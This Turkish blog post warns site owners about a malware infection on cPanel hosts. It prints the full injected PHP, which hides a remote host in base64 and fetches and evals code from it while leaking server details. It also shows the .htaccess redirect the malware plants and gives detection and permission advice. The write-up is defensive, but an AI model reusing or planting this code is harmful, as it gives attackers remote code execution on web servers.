cPanel 11 Virüsü (exploid)

Son günlerde hızla yayılan bu sinsi virüsten etkilenmeyen kalmamıştır sanırım. Sitemdeki garip dosyalardan şüphelenerek aramaya koyulduğumda bunun bir virüs olduğu sonucuna vardım ve bütün sitelerimi temizledim. Bazı kaynaklara göre cpanel 11 virüsü bazılarına göre chmod 777 virüsü ve bazılarına göre ise sadece bir exploid. Adı herneyse can sıkıcı bir durum.

Sitenize bulaştığında pekte farkına varamıyorsunuz. Çünkü dizinlerinizde çok masumca bir kaç dosya oluşturuluyor ve ilk bakışta sanki bir error log dosyası gibi pek şüphe uyandırmıyor.

Virüs CHMOD değeri 777 olan klasörlere numerik dosyalar oluşturarak server bilgilerinizi çalıyor. ( Örn: 546548.php 1647789.php rakamlar.php).

Numerik dosyaların içeriği;

< ?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd")
$f = $_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
eval($c);
else
{
$cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o = curl_exec($cu);
curl_close($cu);
eval($o);
};
?>

Yine aynı dizinde, içi boş WP adında dosya ve birde .htaccess dosyası oluşuyor. .htaccess dosyasının içeriği ;

.htaccess (dosyasında aşağıdaki kodlar bulunuyor...
Options -MultiViews
ErrorDocument 404 //klasöradı/28090.php

 

Bu dosyaları oluşturduktan sonra açtığı framelerle sitenizin arka dizinlerinde haberiniz olmadan reklamlar üretiyor ve google bunları aynen siz yapmışsınız gibi indexliyor.

 

Yukarıdaki resim sitelerimden birinin google indexlerine ait. elz adındaki dizinin chmod değerleri uzun zamandan beri 777 idi.İçine atılan exploid dosyaları sayesinde yukarıdaki gibi bir tablo oluşmuş.

Sitenize bulaşıp bulaşmadığını tespit etmek için google'a girin ve şu şekilde arama yapın;

site:siteadiniz.com "Name Last modified Size Description"


Şuan için bu exploid'in ciddi bir çözüm yolu yok. Dizin değerlerini 777 den aşağı düşürmeniz yararınıza olacaktır. 755 ve aşağısında sisteminize giremiyor.



Etiketler: Virüs Cpanel Exploid

İlk yorumu siz yazın !..

  • Yorumunuz en az 30 karakter olmalıdır. (0)
İlginizi çekebilir...
Sitede Ara

  • Merhaba Ben Arda Özeren Yahya Çavuş Ortaokulu Gidiyorum 10 Sınıfım Bende Yarışma Katılmak İstiyorum Sel...
  • Açıköğretim Aöf Dönem Ücretleri 2024 - 2025 Güncel Öğretim Giderleri Tablosu
    Okumuyorum ve kayıt yenilemiyorum. Nokta....
  • Islets Oyunu Türkçe Yama (Epic ve Steam)
    Rar şifresi nedir? şifreyi belirymemişsiniz...
  • ECA Kombi Aşırı Isınma Arızası Arıza Kodu 6 Nedir Nasıl Çözülür - Pompa Çalışmıyor Olabilir Mi?
    bu hata kodu çıkıyordu kombimizde tarif ettiğiniz şekilde pompayı harekete geçirdik ve sorun çözüldü si...
  • Çiklet (Prenses) Balıklarındaki Ürkeklik ve Korkaklık
    Ben çok uzun süre sp, bp ile frenatus besledim hiç bir sorun yaşamadım. Çok uyumlulardı. Renk katıyor a...
  • Genel İşletme 1. Dönem Vize Soruları
    soru 3 yanlıs bence"...
  • CS 1.5 ve CS 1.6 İçin Sağlam Bir CFG (cengaver.cfg)
    bozuk bu cfg kullanmayın derim ...